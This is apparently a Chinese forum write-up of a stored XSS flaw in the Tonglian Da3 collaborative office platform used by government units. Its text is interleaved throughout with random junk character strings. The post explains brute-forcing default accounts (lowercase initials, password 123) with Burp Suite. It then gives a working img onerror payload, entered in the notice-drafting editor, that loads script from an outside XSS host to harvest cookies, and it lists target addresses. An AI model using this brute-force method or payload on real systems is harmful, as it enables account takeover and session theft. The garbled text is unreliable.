8 g/ {; T: s5 \! m4 Y4 s, t o
+ H/ R2 n- r/ _/ [5 f
同联Da3协同办公平台后台通用储存型xss漏洞
7 S1 K* K. G- W G% x
# N: G! O' v+ f) X4 ?
" a: m6 U- Y+ W& i, V P* n! o) `
平台简介:( a" s: L5 P. @6 X
& Y& M% ?2 I1 {6 K9 E" x
; \8 u9 H' I9 x; B; o
9 L& R3 H/ @9 R3 D4 F
; H% \, }! G8 m- n m8 ?/ j8 w % b% ?5 j1 h1 c2 W$ `7 V9 z+ g* {6 r
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
2 B+ G4 I2 d& d4 G9 w* L4 y同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
- Q, b) k" J4 s% B0 p C$ ]' p
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!1 }3 |. L/ T) C/ U
+ m. j) y, o& I& q( V) J& f" w
8 |+ @5 a) `7 h9 |& a$ r1 j' B
8 H/ ]+ H3 u, U& A$ o) N ^1 z
: y# l0 @) P5 p0 P7 C 8 n: j" D0 A' K' A! {
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
2 u4 P5 V" p. R Q
o* a+ `) i6 c
8 } ^) h+ E) z: e7 G1 m" J$ H+ X
( T7 S7 d5 I, C/ I9 ]& v
$ q" H4 u7 P# o q. Q* w$ a( P : b& T b. D7 c/ K) i0 O
http://1.1.1.1:7197/cap-aco/#(案例2-)
( W; p# ?3 Q! L5 F: ?
9 h9 T4 k! ^- O# M7 A
7 d. I' t- R" A, b" ` http://www.XXOO.com (案例1-官网网站)
4 h' _6 |: q, ?0 v& Z/ K
0 c5 E9 S( E; ^0 Y7 U
- t' |: v; ^. }6 f1 @0 v4 u ]
漏洞详情:
( _3 p) U$ {6 o1 O' r# E s
* n- w4 h' Q/ ^$ B
1 h) @' M2 ?6 P1 P 案例一、
% L1 N' E6 u& B" H0 I7 K
$ G/ k* G% z8 R
6 o2 V" M6 S$ D2 H
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
+ e! Z3 V! l' J" L# }4 C4 H
, |* C5 T) l" ~ # w3 P2 L3 O! ^1 R6 j2 }
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
" O8 E- ~3 y9 r1 B7 K
* t z+ B) d! v
' f& P2 ]& ]1 x0 d ' ~6 j' ?; ?( c7 V& A9 T' ~
( _; U8 }5 X3 o: R7 e: U+ E9 h
" S' q$ `1 p: d6 n3 E0 [! K ! u1 s+ `2 J8 }$ N+ ^5 Q/ z1 \
7 c3 Q+ a6 H' e3 a! S: ]% l
2 g+ h& E6 I, ~& J2 z, n
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
: A6 U; B F0 k0 X& T
( @9 y, f- ?( a, o3 V( _ ) f* x3 d6 F* O9 X. j& d; W6 F
1 O9 R( u- `3 S8 T6 ?6 K# q: e% @; i
5 y+ \! R" n Q9 x . [9 T' H6 d4 ?, J+ l
* M" O1 R1 T1 S' A+ w% ]
- r' ^2 J$ e8 w6 @- d ! W! ~9 b) }% R& ^) V. R5 G
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
3 A. ^* y1 F, u" a9 x# Z
8 J5 Z( p! U/ ]9 w2 N$ P
+ m( g+ \% k, O- w1 C# Z
" h2 C- I7 ^+ Z
& R, W2 W: z6 e( Q5 L$ h 2 `/ |* `+ @% N1 \0 P: h
<img src=x
$ z7 \- {5 N3 K. fonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
$ T( _: v1 Q' j1 H1 c
' H; A& n h/ a
) ?" Z5 Y, T+ k5 T4 o
6 k2 |1 `. ^' E4 }, r# y
3 f$ [! J4 Q$ u! Y; N3 W ( Y& s$ w. r4 W( g2 V. R
然后发送,接收cookie如图: 8 l0 |4 F# x6 ]2 A) P2 O3 F/ k
# y# }# t' g% J$ }! u5 G* |
- w. q; s0 |, R7 P( o+ @
3 U' j9 m' p7 f% y
6 |- z$ K# f/ @0 {) s2 {
% j, Z% m( c; G5 F& j, q
+ }. |) E6 R: }: R+ f: R
) l. t" ?. N7 z- r/ V9 z% @/ J: b
- K3 [) v! v' b8 A) r# d6 j6 F
! p3 m" V1 _! `8 Y
) ?6 R& ]- b: b
8 S9 w V" q9 C: q$ ~
/ E6 F: g3 ?* y8 @3 a$ L" D
$ I- S \* p1 v% r
' ]6 `1 q/ ?2 P, D
6 K4 Z0 }& j* Z( l0 P: j: S
/ P. |, W0 W# s! Q1 ~! x) v3 u
( _* i2 z, V- s# I' `; t1 k, ~ 8 H5 C; u0 q* B3 n1 n0 r& P: p
1 H! K4 L& ?, A# p6 N
4 n, c* Y0 e" v' {( o
7 L/ i# x7 w2 k1 L1 X! F, k7 z" Y
# q! q e; r1 o4 A
' g5 q% U7 o% L7 P# j0 _ 案例2、
5 G. V3 @9 z; ?
7 q1 P) j+ |) c) u' n0 ]+ ` - Q9 {) k/ F4 Z' I! u
前面步骤都一样,下面看效果图: 0 l3 m- e; N# A/ c: a! Y& b0 U0 s
3 f! R3 x" z, ^" g" e4 g! \/ i0 Q" T
9 p$ }4 t5 m4 z, H; D) v" T/ N3 a & S0 C, |+ \1 t) O7 p8 Y0 a9 a
$ e6 ~8 @& `9 Y$ U8 C& x8 Z
' R) D' z0 Q$ ?/ S8 t! T" m! Q
8 b1 E' Y( t. l6 l: a8 O
5 L5 A v" A) K: A- Q 7 \5 `) I# s& T
4 K5 a2 f! J0 V+ d; m+ q
* j. ?" r# u) G/ o
7 {8 a! L* ?# `# y3 \; l2 Q
1 Z/ Y: Z" r6 S% g
! Q, k( u R# S0 J) c9 \ q; y7 b+ c + w6 R: ]" C* x/ u3 w
4 P1 r' s$ \- o3 ?
+ \7 x3 ?7 `1 u$ T* e- v- l 3 W( C0 a3 z' ]( M# z
2 ^# s& @: O6 P! _, m# J
. S* P, e! A4 X( I# \; }5 \1 Z1 W
; b. {6 N5 [3 _
2 r! f) R' o' x5 c+ e3 M, e
' u z6 B# o9 F
) n3 t6 u% u9 W+ t* l+ |1 f 2 Y8 A7 S! J0 T/ i
. J0 f' ~; [/ N ! _0 X6 w! R0 k+ E( V/ y- U
8 e; W) ?- r* H' Z0 F' M; Z
* d% v4 V& R1 W# b0 Q1 W